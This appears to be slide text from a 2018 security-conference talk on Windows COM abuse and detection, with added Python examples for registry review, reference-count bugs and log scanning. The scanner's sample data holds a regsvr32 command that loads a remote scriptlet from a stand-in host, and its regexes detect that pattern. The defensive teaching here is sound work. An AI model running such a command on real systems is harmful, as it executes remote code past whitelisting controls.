Presentation at BSides Iowa 2018 discussing the background of Windows COM, red team value of Windows COM, and how blue teams can also use this knowledge.
2. NEW PHONE; WHO DIS
▸IT Internal Audit Manager, Red Team at ACI Worldwide
▸Previously: Red Team, Pen Tester, IT
▸@maendarb
▸https://vivirytech.blogspot.com
▸There will be pictures, minimal C++
5. WHAT’S THIS WINDOWS COM THING?
▸ Stands for “Component Object Model”
▸ Designed in the 90s to be interoperable, portable
▸ It’s old; great books aren’t digital
▸ Not a “Shell” like CMD or PowerShell
▸ “Like” .NET and WMI
▸ Why am I so interested in this?
6. WHAT’S THIS WINDOWS COM THING? RULE #1: WE DON’T SPEAK ABOUT COM
▸ Used everywhere in Windows
▸ When a user copies files, embeds Excel within Word
▸ It’s abstracted away with GUIs, .Net, APIs, and no one acknowledges that COM objects are being used
7. COM BACKGROUND: COM LIVES EVERYWHERE
▸ Obligatory COM history
▸ Precursor to .NET
▸ Meant to solve problems developers had with things like DLLs
▸ There are so many COM objects, and they won’t go away
▸ OLE and ActiveX fit in here
▸ OLE (Object Linking and Embedding) lets you embed things (e.g. Excel sheet inside Word)
▸ ActiveX lets Internet Explorer make bad life choices
8. COM BACKGROUND: COM ON PAPER IS SUPER EASY TO WORK WITH
▸ Access COM things through interfaces and objects
▸ Scripting.FileSystemObject
▸ IPersist
▸ IFileOperation
▸ WScript.Shell
http://compinfopro.com/enable-remote-desktop-enable-rdp/
10. COM BACKGROUND: IT’S LIKE COM MAKES UP THE RULES AS IT GOES ALONG
▸ COM is a hot mess and can live in:
▸ Windows Registry
▸ Windows made a special registry hive
▸ HKCR (HKEY_Classes_Root)
▸ Combines HKLM and HKCU
▸ Threading / InProcServer32
▸ Manifest files (COM scriptlets; Registration free too!)
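The HKCR point above (one view built from HKLM and HKCU) is worth seeing in code, because per-user class registrations take precedence over machine-wide ones. The following is an added example, not code from the talk: the registry content is constructed, and on a real system the same walk would read HKEY_LOCAL_MACHINE\Software\Classes and HKEY_CURRENT_USER\Software\Classes with the winreg module. It builds the merged view and lists every CLSID whose InProcServer32 is changed or added by the user hive, which is the check a blue team wants when reviewing COM registrations.

```python
"""Merge HKLM and HKCU class data the way HKCR presents it (added example).

Sample registry content below is constructed for illustration.
Rule applied: entries under HKCU\\Software\\Classes win over the
same key under HKLM\\Software\\Classes in the merged HKCR view.
"""
from typing import Dict, List, Optional, Tuple

# Constructed sample: CLSID -> default value of its InProcServer32 key.
HKLM_CLASSES: Dict[str, str] = {
    "{00000001-0000-0000-C000-000000000001}": r"C:\Windows\System32\example1.dll",
    "{00000002-0000-0000-C000-000000000002}": r"C:\Windows\System32\example2.dll",
}
HKCU_CLASSES: Dict[str, str] = {
    # Same CLSID as the machine entry, but a per-user server path: this one wins.
    "{00000002-0000-0000-C000-000000000002}": r"C:\Users\alice\AppData\Local\example2.dll",
    # Registered only for this user; no machine-wide counterpart exists.
    "{00000003-0000-0000-C000-000000000003}": r"C:\Users\alice\AppData\Local\example3.dll",
}


def merged_hkcr(hklm: Dict[str, str], hkcu: Dict[str, str]) -> Dict[str, str]:
    """Return the effective HKCR view: machine entries overlaid by user entries."""
    view = dict(hklm)
    view.update(hkcu)  # per-user registrations take precedence
    return view


def user_overrides(hklm: Dict[str, str],
                   hkcu: Dict[str, str]) -> List[Tuple[str, Optional[str], str]]:
    """List CLSIDs where the user hive changes or adds an InProcServer32.

    Each finding is (clsid, machine_path or None, user_path). A CLSID that
    exists machine-wide but resolves to a different DLL for this user is the
    case worth a second look during a review.
    """
    findings = []
    for clsid, user_path in sorted(hkcu.items()):
        machine_path = hklm.get(clsid)
        if machine_path != user_path:
            findings.append((clsid, machine_path, user_path))
    return findings


if __name__ == "__main__":
    for clsid, machine_path, user_path in user_overrides(HKLM_CLASSES, HKCU_CLASSES):
        kind = "shadows machine entry" if machine_path else "user-only registration"
        print(f"{clsid}: {kind}\n    HKLM: {machine_path}\n    HKCU: {user_path}")
```

Run it as a script to print the two findings; `merged_hkcr` is what a COM client effectively sees when it looks up a CLSID under HKCR.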
13. COM BACKGROUND: COM+ SCRIPTLET? (MOST LIKELY IT WAS JUST COM)
▸ Scriptlets come in both COM and COM+ flavors
▸ They allow you to have COM scripts to do non-malicious things like open calculator and cmd shells
▸ Did you know you can create COM objects from a Java class? Good thing no one has a JRE installed.
https://msdn.microsoft.com/en-us/library/ms524620(v=vs.90).aspx
15. COM BACKGROUND: BREAKING DOWN THAT REGSVR32 HAX
▸ regsvr32 is used to register many things in the registry
▸ /s runs it silently; /n says not to call DllRegisterServer
▸ /u unregisters (uninstalls) the specified COM server
▸ /i calls DllInstall of the COM object being registered
▸ Can be pointed to a file on your system
▸ Can be a URL (http: COM moniker)
▸ Could even be a Java class (java: COM moniker)
▸ scrobj.dll makes the magic go
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
16. COM BACKGROUND: COM+
▸ COM+ meant to solve the problems in COM like:
▸ Quickly implement common configurations for COM components like security boundaries
▸ Load DLLs into processes on demand
▸ Managed methods to manage COM components
▸ Multi-pass… err.. threading
▸ Slick GUI
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
17. COM BACKGROUND: COM+
▸ COM+ also came with rad icons in the GUI
▸ Demo!
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
18. COM BACKGROUND: DCOM
▸ DCOM is “Distributed COM”
▸ “Helps you” in COM and COM+ with distributed transactions
▸ Slings COM object data typically with RPC
▸ Likes to make assumptions you know what you’re doing with security and marshaling data
▸ James Forshaw and Matt Nelson have been finding problems with Windows and apps marshaling data
▸ DCOM lateral movement script (enigma0x3)
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
19. COM BACKGROUND: .NET TO COM (BECAUSE LEGACY APPS AND SADNESS)
▸ .NET can work with COM for interoperability
▸ “The Runtime Callable Wrapper (RCW) is a mechanism that promotes transparent communication between COM and the managed programming model.”
https://msdn.microsoft.com/en-us/library/office/bb610378.aspx
20. COM BACKGROUND: BREAKING DOWN THAT SWEET RCW GOODNESS
▸ This is what PowerShell uses to call into COM objects
https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/ComInterop/ComObject.cs
21. COM BACKGROUND: COM TO .NET (BUT WHY WOULD YOU DO THIS)
▸ COM can work with .Net through COM Callable Wrappers
▸ “When a COM client calls a .NET object, the common language runtime creates the managed object and a COM callable wrapper (CCW) for the object. Unable to reference a .NET object directly, COM clients use the CCW as a proxy for the managed object.”
https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.85).aspx
22. COM BACKGROUND: DEEP TECHNICAL DETAIL OF THAT MAGIC
▸ James Forshaw talked about .Net and COM interoperability at DerbyCon 2017
▸ IronGeek Link: ig2.me/pZ
23. COM BACKGROUND: THE DEEPER YOU GO, THE MORE C/C++ YOU’LL KNOW
▸ To dig in more, you’re going to have to know C and C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
24. COM EXPLOITATION: KNOWING THE C++ STORY CAN BE HELPFUL
▸ QueryInterface is how you query… for interfaces
▸ This is how you figure out what interfaces are available to you
▸ AddRef / Release may be important to you eventually
▸ Important if you want to partake in bug bounties :)
▸ This dictates the object lifetime by reference count
▸ Abusing the reference count introduces other avenues of attack (cough Use After Free)
▸ If open redirects are still around, we should fix those first
https://blog.zsec.uk/cve-2017-3528/
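To make the AddRef / Release lifetime rule concrete, here is an added example (not code from the talk, and a simulation rather than real COM) of an IUnknown-style object whose reference count decides when it is destroyed. It shows the bug class the slide names, a consumer that keeps a pointer without taking its own reference and then touches the object after the owner released it, next to the balanced pattern a CComPtr-style smart pointer gives you. The object names and the `ComPtr` helper are assumptions chosen for illustration; a real COM object would not raise on misuse, it would just be freed memory.

```python
"""Reference-counted lifetime, simulated (added example, not from the talk).

ComObject mimics IUnknown bookkeeping: AddRef/Release return the new count
and the object is destroyed when the count reaches zero. Unlike real COM,
it detects use after that point instead of silently touching freed memory.
"""


class ComObject:
    def __init__(self, name: str):
        self.name = name
        self._refs = 1          # the creator holds the first reference
        self.freed = False

    def AddRef(self) -> int:
        self._check_alive("AddRef")
        self._refs += 1
        return self._refs

    def Release(self) -> int:
        self._check_alive("Release")
        self._refs -= 1
        if self._refs == 0:
            self.freed = True   # last reference gone: object destroyed
        return self._refs

    def do_work(self) -> str:
        self._check_alive("do_work")
        return f"{self.name}: ok"

    def _check_alive(self, op: str) -> None:
        if self.freed:
            raise RuntimeError(f"use-after-free: {op} on released {self.name}")


class ComPtr:
    """Smart pointer in the spirit of CComPtr (assumed name): AddRef on
    acquisition, Release when the block ends, so the count stays balanced."""

    def __init__(self, obj: ComObject):
        self.obj = obj
        obj.AddRef()

    def __enter__(self) -> ComObject:
        return self.obj

    def __exit__(self, *exc) -> bool:
        self.obj.Release()
        return False


def scenario_missing_addref() -> str:
    """Consumer stores a raw pointer without AddRef; the owner releases first."""
    obj = ComObject("Scripting.FileSystemObject")
    stored = obj              # no AddRef: the consumer owns no reference
    obj.Release()             # owner drops the only reference -> destroyed
    try:
        return stored.do_work()  # dangling use
    except RuntimeError as err:
        return str(err)


def scenario_double_release() -> str:
    """One Release too many: the count hits zero while someone still holds it."""
    obj = ComObject("WScript.Shell")
    obj.AddRef()              # 2
    obj.Release()             # 1
    obj.Release()             # 0 -> destroyed, though a holder remains
    try:
        obj.do_work()
        return "no error"
    except RuntimeError as err:
        return str(err)


def scenario_balanced() -> tuple:
    """Every AddRef has a matching Release; destruction happens at the end."""
    obj = ComObject("Scripting.FileSystemObject")
    with ComPtr(obj) as p:    # count 1 -> 2
        result = p.do_work()  # count is 2 here: safe regardless of the owner
    obj.Release()             # count 1 -> 0, destroyed only now
    return result, obj.freed


if __name__ == "__main__":
    print(scenario_missing_addref())
    print(scenario_double_release())
    print(scenario_balanced())
```

The two failing scenarios are exactly what AddRef / Release discipline prevents: a consumer that will use an interface pointer later must own a reference to it, and every reference taken must be released exactly once.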
25. COM EXPLOITATION: USE AFTER FREE HAS ALWAYS BEEN AN ISSUE
▸ Raymond Chen talked about this in 2004
▸ Exploit DB has stuff on AddRef being misused
https://blogs.msdn.microsoft.com/oldnewthing/20040406-00/?p=39903
https://www.exploit-db.com/exploits/41042/
26. COM EXPLOITATION: COM, THE NEVER-ENDING STRUGGLE BUS
▸ Microsoft is still fixing COM related issues
▸ CVE-2018-0880/0882 ; Forshaw - A Bridge Too Far
▸ Researched by Haifei Li, Mark Dowd, James Forshaw
▸ Links posted on https://vivirytech.blogspot.com
▸ COM has a reoccurring theme at conferences: forgotten/“rediscovered”, but still broke (lulz)
▸ Kinda like Adobe issues, right?
27. COM EXPLOITATION: WHAT ARE FUN WAYS COM HAS BEEN EXPLOITED?
▸ How is COM exploited?
▸ UACMe
▸ James Forshaw
▸ Casey Smith
▸ Matt Nelson
28. COM EXPLOITATION: WHAT TOOLS CAN I USE TO LEARN MORE? ALL FREE!
▸ Microsoft Process Explorer
▸ Find medium to high integrity attack paths
▸ ReactOS
▸ James Forshaw OleViewDotNet (github.com/tyranid/oleviewdotnet)
▸ See the COM goodies in Windows
▸ Find new unexplored attack COM paths!
29. WINDOWS COM, MICROSOFT’S GIFT TO THE RED TEAM
▸ Holy attack surface Batman! Thanks OleViewDotNet!
▸ 3,592 ways to see if you can discover a new attack path
30. WHAT HAPPENS WHEN I PRESS THIS BUTTON?
▸ Hey kid, wanna crash something? (this can peg your CPU)
▸ Watch with Process Monitor for potential attack paths
https://github.com/FuzzySecurity/DefCon25
fondue.exe may be a privilege escalation path
31. WE NEED THE BLUE TEAM, AND THEY NEED US
▸ There’s a lot of fun things that leverage COM
▸ ZeroSum’s Koadic: COM C&C
▸ MITRE’s ATT&CK framework
▸ @SubTee tweets (seriously)
▸ We need to use their research to our gain
▸ Run things like Squiblydoo to see EDR response
▸ Work with the product groups and blue team
▸ See how these products trigger IOCs and act
32. BLUE TEAM FUN!
▸ Are you running Windows 10 RS4 / Windows Server 2016?
▸ SpecterOps Device Guard configs / guide
▸ Are you doing PowerShell cmdline audit AND reviewing?
▸ Users probably don’t run PowerShell; if they do, use v5+
▸ Pick up on keywords like “-COMObject”
▸ Do you really need wscript and cscript enabled?
▸ It can be done, ask @fpieces, he’s done it
▸ Deters attacks leveraging DotNetToJScript
▸ Investigate the potential of SysMon and Project VAST
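The audit advice above (watch the PowerShell command line for “-COMObject”, question whether wscript and cscript are needed) and the earlier regsvr32 breakdown (the /i switch accepting a URL or java: moniker, scrobj.dll doing the work) both reduce to the same blue-team task: scan process-creation records for those patterns. The following is an added example, not code from the talk or any product; the log lines are constructed, with a Sysmon-style “Image / CommandLine” layout assumed, and the rule names and the example.invalid host are placeholders. It flags the regsvr32 scriptlet pattern, PowerShell COM object creation, and Windows Script Host launches, while leaving an ordinary local regsvr32 registration and a plain PowerShell command alone.

```python
"""Scan process-creation log lines for COM-related patterns (added example).

The log lines are constructed; the layout (Image: ...  CommandLine: ...)
mimics a Sysmon process-creation event flattened to one line.
"""
import re
from typing import List, Tuple

# Rule name -> pattern over the full log line. Names are placeholders.
RULES = [
    # regsvr32 handed a scriptlet via scrobj.dll, or /i: pointing at a
    # URL or java: moniker instead of a local DLL.
    ("regsvr32 scriptlet load",
     re.compile(r"regsvr32(\.exe)?\b.*(scrobj\.dll|/i:\s*\"?(https?|java):)", re.I)),
    # PowerShell creating a COM object: the "-COMObject" keyword from the slide.
    ("PowerShell COM object creation",
     re.compile(r"powershell(\.exe)?\b.*-ComObject\b", re.I)),
    # Windows Script Host hosts; many environments can disable both.
    ("Windows Script Host launched",
     re.compile(r"\b[wc]script\.exe\b", re.I)),
]

# Constructed sample events: two should be ignored, three should be flagged.
LOG_LINES = [
    r"Image: C:\Windows\System32\regsvr32.exe  CommandLine: regsvr32 /s /n /u "
    r"/i:http://example.invalid/x.sct scrobj.dll",
    r"Image: C:\Windows\System32\regsvr32.exe  CommandLine: regsvr32 /s "
    r'"C:\Program Files\Vendor\vendor.dll"',
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  CommandLine: "
    r'powershell -Command "New-Object -ComObject WScript.Shell"',
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  CommandLine: "
    r'powershell -Command "Get-Process"',
    r"Image: C:\Windows\System32\wscript.exe  CommandLine: wscript.exe "
    r"C:\Users\alice\logon.vbs",
]


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, rule name) for every rule that matches a line."""
    hits = []
    for idx, line in enumerate(lines):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((idx, name))
    return hits


def command_line(line: str) -> str:
    """Pull the CommandLine field out of a flattened event, for reporting."""
    marker = "CommandLine:"
    pos = line.find(marker)
    return line[pos + len(marker):].strip() if pos >= 0 else line


if __name__ == "__main__":
    for idx, name in scan(LOG_LINES):
        print(f"[{name}] {command_line(LOG_LINES[idx])}")
```

The rules are deliberately narrow: a silent regsvr32 of a local DLL is what installers do all day, so only the scriptlet and moniker forms fire, and “WScript.Shell” inside a PowerShell command is attributed to the PowerShell rule rather than the script-host rule. Tuning for your estate means adding to `RULES`, not loosening them.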
33. IT’S ALMOST TIME TO GO, LET’S REVIEW QUICKLY
▸ COM is everywhere, as it was ~20 years ago
▸ Lots of things not covered like “TreatAs” and monikers
▸ Many “exploits” are just abusing design decisions
▸ More research and community made tools will (most likely) bring to light more COM exploits and wreckage
▸ Other organizations also add their own COM objects
▸ Sad face:
34. LEARN MORE AND CONTACT ME BELOW
▸ For more info about COM:
▸ https://vivirytech.blogspot.com
▸ @maendarb
▸ Slack: https://omasec.herokuapp.com